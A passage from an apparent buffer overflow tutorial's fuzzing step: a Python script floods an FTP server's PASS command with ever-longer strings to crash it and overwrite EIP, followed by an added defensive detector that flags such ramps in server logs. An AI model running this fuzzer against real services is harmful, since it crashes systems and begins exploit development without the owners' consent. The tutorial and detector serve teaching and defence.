4. Fuzzing
The following Python script can be modified to fuzz a remote entry point of an application. It sends increasingly long buffer strings in the hope that one of them eventually crashes the application.
import socket, sys, time

ip = "10.0.0.1"
port = 21
timeout = 5

# Create an array of increasingly long buffer strings (100, 200, ..., 3000 bytes).
buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)                        # server banner
        s.send(b"USER username\r\n")        # sockets take bytes in Python 3
        s.recv(1024)
        print("Fuzzing PASS with %s bytes" % len(string))
        s.send(("PASS " + string + "\r\n").encode())
        s.recv(1024)
        s.send(b"QUIT\r\n")
        s.recv(1024)
        s.close()
    except OSError:
        # A refused connection or a timeout usually means the previous buffer crashed the service.
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)
Note that the send() call must be changed to the command that was spiked; the format that command expects can be identified by inspecting the EAX register in the previous step (spiking). Also add or remove recv() calls to match the number of responses the server sends for those commands.

Finally, run this script and check whether the EIP register has been overwritten with A's (\x41). Make a note of any other registers that have either been overwritten or are pointing to memory that has been overwritten.
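From the defender's side, the same behaviour is easy to spot in a server's command log. The following detection sketch is an added example, not part of the original page: it parses a constructed FTP command log (the line format is an assumption, not any real daemon's) and flags both an oversized PASS argument and the fixed-step length ramp that a fuzzer like the script above produces from one client.

```python
import re
from collections import defaultdict, namedtuple

# Constructed log format (an assumption, not any specific FTP daemon's):
#   <ISO timestamp> <client-ip> <COMMAND> [argument]
LINE_RE = re.compile(r"^(\S+) (\S+) ([A-Z]{3,4})(?: (.*))?$")
MAX_ARG_LEN = {"USER": 64, "PASS": 128}  # longest argument each command legitimately needs
RAMP_STEPS = 3                            # consecutive fixed-step growths that count as a ramp
Alert = namedtuple("Alert", "client command kind detail")  # kind is "oversized" or "ramp"

def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, cmd, arg = m.groups()
    return ts, client, cmd, arg or ""

def detect(lines):
    alerts = []
    history = defaultdict(list)  # (client, command) -> argument lengths seen, in order
    for line in lines:
        parsed = parse_line(line)
        if parsed is None or parsed[2] not in MAX_ARG_LEN:
            continue
        ts, client, cmd, arg = parsed
        limit = MAX_ARG_LEN[cmd]
        lens = history[(client, cmd)]
        lens.append(len(arg))
        if len(arg) > limit:
            alerts.append(Alert(client, cmd, "oversized", f"{ts}: {len(arg)} bytes > {limit}"))
        # The fuzzer grows the payload by a fixed step (100 bytes) on every new connection.
        tail = lens[-RAMP_STEPS:]
        steps = {b - a for a, b in zip(tail, tail[1:])}
        if len(tail) == RAMP_STEPS and len(steps) == 1 and steps.pop() > 0 and tail[-1] > limit:
            alerts.append(Alert(client, cmd, "ramp", f"{ts}: lengths {tail}"))
    return alerts

# Constructed sample: one normal login, then a client ramping PASS by 100 bytes per connection.
SAMPLE_LOG = [
    "2024-05-01T10:00:00Z 10.0.0.7 USER alice",
    "2024-05-01T10:00:01Z 10.0.0.7 PASS s3cret",
    "2024-05-01T10:00:02Z 10.0.0.7 QUIT",
] + [
    f"2024-05-01T10:01:{n // 100:02d}Z 10.0.0.5 {cmd}"
    for n in (100, 200, 300, 400)
    for cmd in ("USER username", f"PASS {'A' * n}", "QUIT")
]
```

Running detect(SAMPLE_LOG) yields three "oversized" alerts and two "ramp" alerts, all for 10.0.0.5, while the normal login produces none.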